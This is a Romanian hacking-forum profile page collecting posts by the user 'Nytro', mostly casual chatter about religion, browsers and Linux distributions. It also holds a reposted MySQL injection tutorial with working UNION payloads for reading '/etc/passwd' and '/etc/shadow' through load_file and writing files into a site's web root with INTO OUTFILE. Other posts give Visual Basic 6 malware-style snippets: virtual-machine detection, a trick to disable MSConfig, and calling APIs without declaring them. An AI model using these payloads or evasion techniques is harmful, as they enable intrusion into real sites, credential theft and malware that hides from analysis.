-
Posts
18736 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Am mai pus eu 3 "oglinzi"
-
Ai fi surprins sa afli cat de prosti sunt unii credinciosi. Eu plec din start de la ideea ca "este credincios, esti din start mai prost decat mine". Oarecum... Edit: http://home3.paulschou.net/tools/xlate/ Cifra 6 in binar e "110" nu ca in diagrama postata de "KillBOT". Scrieti: "mue" la Text si dati Encode. O sa vedeti forma binara: 0110[B]110[/B]1 01[B]110[/B]101 0[B]110[/B]0101 Deci "mue" contine pe Satanta! Deci cand dati muie, scoateti o bucata de Satana din voi. Deci daca dati mult muie ajungeti calugari.
-
Fireste, doar sunt gratis. Si tot ce e gratis e bun, chiar daca rugineste in garaj nefiind folosit niciodata...
-
Atunci ii dam ban baiatului
-
Primul base64: http://pastebin.com/sXuDLdPK Apoi, acel base64 din ce e in link-ul de mai sus e encryptat cu un xor simplu. Si cred ca dupa aceea se ajunge la sursa originala. In loc de: eval($codelock_decrypter["c"]); Pui si tu: echo $codelock_decrypter["c"]; Si te uiti in sursa paginii rezultate.
-
Posteaza aici PHP-ul. Dar cel mai probabil e obfuscat, deci va fi destul de greu sa ajungi la sursa propriu-zisa.
-
Sa fim serios, cel mai bun tutorial de configurare ar fi un manual de limba engleza.
-
Cine mai comenteaza aiurea la topicurile de "bun venit" are ban. Utilizatorii isi fac o parere gresita din cauza unor ratati ca voi. _|_
-
Google Chrome 6 beta, funcţii noi şi viteză mai mare
Nytro replied to alexalghisi's topic in Stiri securitate
Ce nu imi place la Chrome e ca nu prea e customizabil, prea putine setari iti permite sa faci. -
Eu nu prea am mai folosit Windows, dar am incercat si IE si imi place cum se misca. IE 7 era cam greoi, dar IE 8 imi place. Cred ca o sa se vada niste diferente intre IE8 si IE9, si asta in bine.
-
Pai cam asta ar fi probleme. Daca nu e detectabil si pare curat pe virustotal, e posibil sa fie cryptat/bindat. Oricum, majoritatea link-urilor de download contin programele infectate, la asta s-a ajuns cu furtul informational...
-
Nu aia inseamna sa dai drepturi de autor. Asadar, nu e nevoie sa se specifice pagina de unde au fost luate informatiile, doar daca e vorba de un articol care nu are specificat autorul, sau alte astfel de cazuri.
-
MySQL Injection - Simple Load File and Into OutFile
Nytro replied to Nytro's topic in Tutoriale in engleza
Nu prea am inteles ce vrei sa zici. Pui ce nume de tabel, ce coloana sau ce fisier vrei tu. Numai sa exista pe server. -
Nu o sa contina nici un mecanism de localizare prin GPS. E acelasi lucru ca si cu buletinu: o poza cu tine si alte prostii. Dar e mai "cool", mai "trendy". Nu prea ii inteleg pe analfabetii aia de credinciosi care: "Cipu contine pe Satana!!". Care e legatura intre cipurile astea si Satana?
-
MySQL Injection - Simple Load File and Into OutFile
Nytro replied to Nytro's topic in Tutoriale in engleza
Baza de date "mysql" impreuna cu tabelele sale exista deja. Apartin serverului MySQL. -
Cred ca e vorba de [..] adica [ .. ] si cred ca merge
-
Am reparat si "meniul" de emoticoane. Acum nu se mai repeta (primele care apar acolo): Astept aici probleme legate de emoticoane. Nu vreau sa vad alte prostii sau teste aici.
-
Am votat Mandriva pentru ca asta e distributia pe care o folosesc si care cred ca mi-a placut cel mai mult. Avantaje: KDE (poti alege Gnome la instalare, eu nu suport Gnome), Package Manager care nu iti creaza atatea probleme ca Synaptic (bine, am vrut sa dezinstalez Avahi si imi scotea si Eclipse si multe alte lucruri utile cu care habar nu am ce legatura are), ai acele optiuni ale sale (Configure your computer) de unde poti face multe modificari utile, vine cu o larga gama de pachete, se updateaza singur automat (eu am si upgradat la Spring) si multe altele. Si mi-a mai placut Slackware, care este mai putin user-friendly dar de la care am invatat multe. Imi placea ca steteam logat pe root si faceam ce ma taia capul, mi-am editat toate fisierele de "start-up", faceam ce ma ducea capul, si il facusem sa booteze foarte repede (scosesem sa seteze hardware clock, hostname si multe altele).
-
MySQL Injection - Simple Load File and Into OutFile | MySQL Injection - Simple Load File and Into OutFile (tutorial) | | Author: MikiSoft ---------------------------------------------------------------- === [ Part 1 - Introduction ] If you know (basic) MySQL Injection, you can read this tutorial... Ok, let's see now what are Load File and Into OutFile. -- What are Load File and Into OutFile? That are syntaxes (used in MySQL Injections). Load File: Reads the file and returns the file contents as a string. Into OutFile: Writes the selected rows to a file. The file is created on the server host, so you must have the file privilege to use this syntax. File to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed. (... from: MySQL.com) Ok, let's begin now! - [ Part 2 - Access to "mysql.user" table and file privileges ] If you are using MySQL Injection method (to hack sites), and before you find target table (and columns), check, if you have access to "mysql.user" table. And you must replace in URL one visible column (i.e. number, that is shown, on page), with (string) "user", to see user name. Let's see our example: http://vulnsite.com/index.php?id=-1+union+all+select+1,user,3,4+from+mysql.user-- In our example, column (number) 2 can be seen on our vulnerable page. If page returns user name, in place where is that visible column (shown) on site, that's good - you have access (to "mysql.user" table), and you can continue to read this tutorial. Don't forget to remember user name that you have seen! In our example that happens (we have access to "mysql.user" table), and we can continue to check now if we have file privileges. You must now replace in URL: "user", with (string) "group_concat(user,0x3a,file_priv)", to check, if you have file privileges on (your) vulnerable site. Here is our example: http://vulnsite.com/index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user-- Now on place, where is that (visible) column shown (i.e. replaced), it lists users and file privileges (in format: User name:File privileges, ...), and you must find user name that you have seen before, and when you find that user name, look on right side (near that user name), and if it writes "Y" (that means Yes), you have file privileges (and you can continue to read this tutorial), otherwise, if it writes "N" (that means No), you haven't file privileges. In our example we have file privileges (of course) - "... ,ouruser:Y, ...". Let's go now to the next part. - [ Part 3 - Using Load File syntax ] Load File is useful when you want to read some (configuration) files (it's like LFI - Local File Inclusion), ex. "/etc/passwd", "/etc/shadow", etc. Syntax is: load_file('FILE') Here is our example - if we want to read "/etc/passwd" file: http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user-- In place where is column (number) 2, it will show (source of) "/etc/passwd" file (on page). Note 1: "../" - means move to directory back. Note 2: If it shows error (when you try to read some file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert file name (i.e. text/string), to Hex or Char (and then remove "'" symbols): For Hex - Always put "0x" (text) before hex string (without any spaces), and that (final) string must not contain (any) spaces(!) ; ex. (Load File - "/etc/passwd":) load_file(0x2f6574632f706173737764) For Char - Usage: char(NUMBERS,NUMBERS,NUMBERS...) ; If you convert string (i.e. text) to Char, and if converted text (to Char) contain spaces (between numbers), you must replace all that spaces with commas(!) ; ex. (Load File - "/etc/passwd":) load_file(char(47,101,116,99,47,112,97,115,115,119,100)) BTW. Here is one translator, i.e. text to Hex and (text to) Char converter: http://home2.paulschou.net/tools/xlate/ That's all for Load File syntax. - [ Part 4 - Using Into OutFile syntax ] Into OutFile is useful when you want to write/make some file (on your vulnerable site/server), ex. make (simple PHP) file, that is vulnerable on RFI (Remote File Inclusion), and then exploit that hole... Syntax is: INTO OUTFILE 'FILE' Note 1: That syntax must be always on end (it's like table)! Ex. ...+INTO+OUTFILE+'/FILE'-- To write (your) text in (your) file (on vulnerable site/server), replace in URL one visible column (i.e. number, that is shown, on page), with (your) text (to be written, in your file), in quotes... Let's see our example - we want to write text "testing" in file "test.txt" (on our vulnerable site/server), in site directory: http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- Note 2: If you have two or more visible columns (i.e. numbers, that are shown, on your vulnerable page), you have to replace that columns (i.e. numbers, in URL), with word "null"(!) (If you don't replace, that numbers will be written together with your text in your file, on vulnerable site/server.) In our example, visible columns are - 2 and 3 (and we must do replacing): http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- And then, if page loads normally (without any errors), we have successfully made our file (on our vulnerable site/server), and location of our file (on our vulnerable site/server), will be: http://vulnsite.com/test.txt Note 3: If you want to use in (your) text (to be written, in your file) Return/Enter button, just (type your text somewhere - in converter/translator, and) convert it to Hex or Char... Note 4: You must write (i.e. make all your files) into site path, otherwise, Into OutFile syntax won't work. Note 5: If it shows blank (i.e. error, on page), where should be located (your) text (to be written, in your file) - it has magic quotes enabled (it add slashes before and after "'" symbols), and you have to (avoid that and) convert text (i.e. string), to Hex or Char (and then remove "'" symbols) - see above explanation (and link to converter), in (end of) part 3... Warning: Don't convert (your) file name into Hex or Char, otherwise, it won't work (that's only for Into OutFile syntax)! And, if (your) vulnerable site have magic quotes (feature) enabled, Into OutFile syntax will not work. That's all for Into OutFile syntax. - [ Part 5 - End ] That's all about that syntaxes, used in MySQL Injections (with access to "mysql.user" table, of course)... I don't know what else to say, just - GL & HF!!! -- Greetz to (communities): Ljuska.org, MadSpot.org That's all folks! Bye. === @ Exploit-DB
-
By Victor A. Milokum, Apriorit Inc | 17 Mar 2010 Articolul: http://www.codeproject.com/KB/system/sst-unhook.aspx
-
Pun link, e aranjat si se vede mult mai bine. By SergeyPopenko, Apriorit Inc, Ivan Romanenko | 17 Aug 2009 Articolul aici: http://www.codeproject.com/KB/system/hide-driver.aspx
-
'----------------------------------------- 'Detect VMWare 'Tested : VNWare 6.0 -> 7.0 'Coder : DungCoi (VirusVN.com) 'Email : dungcoivb@gmail.com '----------------------------------------- Private Type DISPLAY_DEVICE cb As Long DeviceName As String * 32 DeviceString As String * 128 StateFlags As Long DeviceID As String * 128 DeviceKey As String * 128 End Type Private Declare Sub GetSystemInfo Lib "kernel32" (lpSystemInfo As SYSTEM_INFO) Private Type SYSTEM_INFO dwOemID As Long dwPageSize As Long lpMinimumApplicationAddress As Long lpMaximumApplicationAddress As Long dwActiveProcessorMask As Long dwNumberOrfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long dwReserved As Long End Type Private Declare Function EnumDisplayDevices Lib "user32" Alias "EnumDisplayDevicesA" (Unused As Any, ByVal iDevNum As Long, lpDisplayDevice As DISPLAY_DEVICE, ByVal dwFlags As Long) As Boolean Sub Main() Dim strVGA As String strVGA = getVGACard If InStr(1, LCase(strVGA), "vmware") > 0 Then MsgBox "Dze dze. VMWare", , "VirusVN.com" Else MsgBox "I'm not running on VMWare :P", , "VirusVN.com" End If End End Sub Public Function getVGACard() As String Dim DD As DISPLAY_DEVICE DD.cb = Len(DD) If EnumDisplayDevices(ByVal 0&, 0, DD, ByVal 0&) Then getVGACard = Left$(DD.DeviceString, InStr(1, DD.DeviceString, Chr$(0)) - 1) Else getVGACard = "" End If End Function
-
'KERNEL32 Private Declare Function CreateSemaphoreW Lib "KERNEL32" (ByVal lpSemaphoreAttributes As Long, ByVal lInitialCount As Long, ByVal lMaximumCount As Long, ByVal lpName As Long) As Long '--------------------------------------------------------------------------------------- ' Procedure : DisableMsConfig ' Author : Karcrack ' Date : 12/08/2010 '--------------------------------------------------------------------------------------- ' Public Function DisableMsConfig() As Boolean Call CreateSemaphoreW(0, 0, 1, StrPtr("MSConfigRunning")) DisableMsConfig = (Err.LastDllError = 0) End Function
-
Author: Karcrack Source: http://www.advancevb.com.ar/?p=567 '--------------------------------------------------------------------------------------- ' Module : mZombieInvoke ' Author : Karcrack ' Now : 09/08/2010 13:37 ' Purpose : Calling API without declaring ' Only uses VB6 functions ' History : 20100908 First cut ....................................................... '--------------------------------------------------------------------------------------- Option Explicit Private Type Zombie_STRUCT1 cNull As Currency 'Must be 0 ppS2 As Long 'Pointer to pointer to Zombie_STRUCT2 End Type Private Type Zombie_STRUCT2 lNull As Long 'Must be 0 lAddr As Long 'The Addr End Type Private Type tAPICall ptsLIB As Long ' Pointer to ANSI String that contains Library (NULL TERMINATED!) ptsProc As Long ' Pointer to ANSI String that contains Procedure(NULL TERMINATED!) lReserved As Long ' Just reserved... lPointer As Long ' Pointer to the buffer that will contain temp variables from DllFunctionCall lpBuffer(3) As Long ' Buffer that will contain temp variables End Type Private Type DUMB_LONG lLNG As Long End Type Private Type BYTES_LONG b1 As Byte: b2 As Byte b3 As Byte: b4 As Byte End Type 'MSVBVM60 Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long Private Declare Function Zombie_AddRef Lib "MSVBVM60" (ByRef tStructure As Zombie_STRUCT1) As Long Private bvASM(&HFF) As Byte Public Function Invoke(ByVal sLibName As String, ByVal sProcName As String, ParamArray vParams() As Variant) As Long Dim hMod As Long Dim S1 As Zombie_STRUCT1 Dim S2 As Zombie_STRUCT2 Dim i As Long Dim iCount As Long hMod = GetPointer(sLibName, sProcName) '//POP EAX '//POP EBX '//PUSH EAX Call AddByte(&H58, iCount): Call AddByte(&H5B, iCount): Call AddByte(&H50, iCount) For i = UBound(vParams) To LBound(vParams) Step -1 '//PUSH CLng(vParams(i)) Call AddPush(CLng(vParams(i)), iCount) Next i '//CALL hMod '//RET Call AddCall(hMod, iCount): Call AddByte(&HC3, iCount) S2.lAddr = VarPtr(bvASM(0)) S1.ppS2 = VarPtr(VarPtr(S2)) Invoke = Zombie_AddRef(S1) End Function Private Function GetPointer(ByVal sLib As String, ByVal sProc As String) As Long Dim tAPI As tAPICall Dim bvLib() As Byte Dim bvMod() As Byte bvLib = StrConv(sLib + vbNullChar, vbFromUnicode): bvMod = StrConv(sProc + vbNullChar, vbFromUnicode) With tAPI .ptsLIB = VarPtr(bvLib(0)): .ptsProc = VarPtr(bvMod(0)) .lReserved = &H40000: .lPointer = VarPtr(.lpBuffer(0)) End With GetPointer = DllFunctionCall(tAPI) End Function Private Sub AddCall(ByVal lpPtrCall As Long, ByRef iCount As Long) Call AddByte(&HB8, iCount) '//MOV EAX, ________ Call AddLong(lpPtrCall, iCount) '//_______, XXXXXXXX Call AddByte(&HFF, iCount) '//CALL EXX Call AddByte(&HD0, iCount) '//____ EAX End Sub Private Sub AddPush(ByVal lLong As Long, ByRef iCount As Long) Call AddByte(&H68, iCount) '//PUSH, ________ Call AddLong(lLong, iCount) '//____, XXXXXXXX End Sub Private Sub AddLong(ByVal lLong As Long, ByRef iCount As Long) 'Swap Endian (Ej: 0xDEADBEEF <-> 0xEFBEADDE) Dim tDL As DUMB_LONG Dim tBL As BYTES_LONG tDL.lLNG = lLong LSet tBL = tDL Call AddByte(tBL.b1, iCount): Call AddByte(tBL.b2, iCount) Call AddByte(tBL.b3, iCount): Call AddByte(tBL.b4, iCount) End Sub Private Sub AddByte(ByVal bByte As Byte, ByRef iCount As Long) bvASM(iCount) = bByte: iCount = iCount + 1 End Sub Sample: Invoke "USER32", "MessageBoxW", 0, StrPtr("Karcrack FTW!!!"), StrPtr("Fuck yeah!"), 0 Vedeti in exemplu ce face. Foloseste numai API-uri din MSVB60.DLL.